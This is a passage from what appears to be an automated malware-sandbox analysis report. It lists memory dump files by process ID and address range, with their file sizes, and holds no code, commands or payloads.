                  • memory/1828-111-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/1828-200-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/1828-142-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/1828-163-0x0000000010000000-0x000000001001C000-memory.dmp

                    Filesize

                    112KB

                  • memory/1980-1035-0x0000000140000000-0x0000000140447000-memory.dmp

                    Filesize

                    4.3MB

                  • memory/1980-1036-0x0000000000800000-0x0000000000988000-memory.dmp

                    Filesize

                    1.5MB

                  • memory/2064-201-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/2064-137-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/2064-309-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/2064-139-0x0000000000400000-0x000000000042E000-memory.dmp

                    Filesize

                    184KB

                  • memory/2200-144-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2512-20-0x00000000068E0000-0x00000000068FA000-memory.dmp

                    Filesize

                    104KB

                  • memory/2512-4-0x0000000005520000-0x0000000005542000-memory.dmp

                    Filesize

                    136KB

                  • memory/2512-24-0x00000000078B0000-0x00000000078D2000-memory.dmp

                    Filesize

                    136KB

                  • memory/2512-25-0x0000000008730000-0x0000000008CD4000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/2512-19-0x0000000007B00000-0x000000000817A000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2512-2-0x0000000004E20000-0x0000000004E56000-memory.dmp

                    Filesize

                    216KB

                  • memory/2512-3-0x0000000005590000-0x0000000005BB8000-memory.dmp

                    Filesize

                    6.2MB

                  • memory/2512-18-0x0000000006470000-0x00000000064BC000-memory.dmp

                    Filesize

                    304KB

                  • memory/2512-23-0x0000000007920000-0x00000000079B6000-memory.dmp

                    Filesize

                    600KB

                  • memory/2512-17-0x00000000063E0000-0x00000000063FE000-memory.dmp

                    Filesize

                    120KB

                  • memory/2512-16-0x0000000005E00000-0x0000000006154000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/2512-6-0x0000000005D90000-0x0000000005DF6000-memory.dmp

                    Filesize

                    408KB

                  • memory/2512-5-0x0000000005CB0000-0x0000000005D16000-memory.dmp

                    Filesize

                    408KB

                  • memory/2672-54-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2672-53-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2708-961-0x0000000000400000-0x000000000068D000-memory.dmp

                    Filesize

                    2.6MB

                  • memory/2752-108-0x0000000000400000-0x0000000000E11000-memory.dmp

                    Filesize

                    10.1MB

                  • memory/2752-116-0x0000000000400000-0x0000000000E11000-memory.dmp

                    Filesize

                    10.1MB

                  • memory/2828-159-0x0000000000400000-0x0000000000464000-memory.dmp

                    Filesize

                    400KB

                  • memory/2828-160-0x0000000000400000-0x0000000000464000-memory.dmp

                    Filesize

                    400KB

                  • memory/3044-135-0x0000000000400000-0x0000000000CCE000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3044-141-0x0000000000400000-0x0000000000CCE000-memory.dmp

                    Filesize

                    8.8MB

                  • memory/3560-72-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-318-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-90-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-89-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-167-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-1004-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-117-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-56-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-55-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-222-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-48-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-51-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/3560-50-0x0000000000D40000-0x00000000011F2000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/4184-999-0x00000286A8A10000-0x00000286A8A1A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4184-1000-0x00000286A8A20000-0x00000286A8A28000-memory.dmp

                    Filesize

                    32KB

                  • memory/4184-987-0x00000286A87A0000-0x00000286A87C2000-memory.dmp

                    Filesize

                    136KB

                  • memory/4184-998-0x00000286A8A30000-0x00000286A8A4C000-memory.dmp

                    Filesize

                    112KB

                  • memory/4184-1001-0x00000286A8B90000-0x00000286A8B9A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4296-1119-0x0000000000400000-0x00000000008C2000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/4332-313-0x00007FF822230000-0x00007FF822425000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/4332-310-0x0000000000590000-0x000000000059A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4332-312-0x0000000000A80000-0x0000000000E80000-memory.dmp

                    Filesize

                    4.0MB

                  • memory/4332-315-0x0000000075920000-0x0000000075B35000-memory.dmp

                    Filesize

                    2.1MB

                  • memory/5208-46-0x0000000000BC0000-0x0000000001072000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/5208-49-0x0000000000BC0000-0x0000000001072000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/5208-35-0x0000000000BC0000-0x0000000001072000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/5332-976-0x0000020E54C70000-0x0000020E54CE1000-memory.dmp

                    Filesize

                    452KB

                  • memory/5332-964-0x0000000000140000-0x0000000000142000-memory.dmp

                    Filesize

                    8KB

                  • memory/5332-966-0x0000020E54C70000-0x0000020E54CE1000-memory.dmp

                    Filesize

                    452KB

                  • memory/5332-973-0x0000020E54C70000-0x0000020E54CE1000-memory.dmp

                    Filesize

                    452KB

                  • memory/5332-975-0x0000020E54C70000-0x0000020E54CE1000-memory.dmp

                    Filesize

                    452KB

                  • memory/5456-270-0x000000000C650000-0x000000000C7A4000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/5456-275-0x000000000CB50000-0x000000000CC02000-memory.dmp

                    Filesize

                    712KB

                  • memory/5456-271-0x0000000004E10000-0x0000000004E2A000-memory.dmp

                    Filesize

                    104KB

                  • memory/5456-218-0x00000000066A0000-0x00000000066EC000-memory.dmp

                    Filesize

                    304KB

                  • memory/5456-272-0x000000000C8F0000-0x000000000C8FA000-memory.dmp

                    Filesize

                    40KB

                  • memory/5456-221-0x0000000007320000-0x00000000073B2000-memory.dmp

                    Filesize

                    584KB

                  • memory/5456-223-0x0000000000EB0000-0x0000000000EB8000-memory.dmp

                    Filesize

                    32KB

                  • memory/5456-224-0x0000000007570000-0x0000000007668000-memory.dmp

                    Filesize

                    992KB

                  • memory/5456-277-0x000000000D090000-0x000000000D0DE000-memory.dmp

                    Filesize

                    312KB

                  • memory/5456-276-0x000000000CDE0000-0x000000000CFA2000-memory.dmp

                    Filesize

                    1.8MB

                  • memory/5456-216-0x0000000005A30000-0x0000000005D84000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/5456-274-0x000000000CA40000-0x000000000CA90000-memory.dmp

                    Filesize

                    320KB

                  • memory/6108-71-0x0000000000EF0000-0x00000000013AB000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/6108-73-0x0000000000EF0000-0x00000000013AB000-memory.dmp

                    Filesize

                    4.7MB